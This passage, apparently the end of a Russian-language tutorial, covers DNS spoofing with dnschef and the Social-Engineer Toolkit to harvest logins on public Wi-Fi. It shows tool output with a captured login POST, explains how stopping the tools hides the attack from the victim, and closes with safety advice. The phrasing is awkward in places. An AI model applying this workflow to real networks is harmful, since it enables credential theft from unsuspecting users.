 [*] ПОСЛЕ ЗАВЕРШЕНИЯ ЗАВЕРШЕНИЯ, НАЖМИТЕ CONTROL-C, ЧТОБЫ СОЗДАТЬ ОТЧЕТ. 192.168.1.1 - - [18/окт. 21] "POST /login.php?s=301f0571702614d88e1b330ebaa0751d&do=login HTTP/1.1" 302 - 

На этом этапе вы можете остановить « dnschef » и « settoolkit «, и пользователь-жертва, несомненно, обновится. Это будет означать, что наш ответчик DNS не будет отвечать, он попадет на настоящий сайт, и им будет все равно.

Я знаю, что это может показаться безумием, но это просто показывает, насколько осторожными вы должны быть при использовании общедоступного доступа в Интернет или даже при посещении вредоносных сайтов по ошибке. Я знаю, что все очень взволнованы, когда вы находите бесплатный Wi-Fi, когда вас нет дома, но просто спросите себя, можете ли вы ему доверять? Если их Wi-Fi отправляет вам плохие DNS-серверы, вам конец. Если они не защитили свой маршрутизатор должным образом, а хакер добавил плохие DNS-серверы.

Рекомендуется иметь приличный антивирусный сканер с веб-защитой, который поможет вам защититься от этого.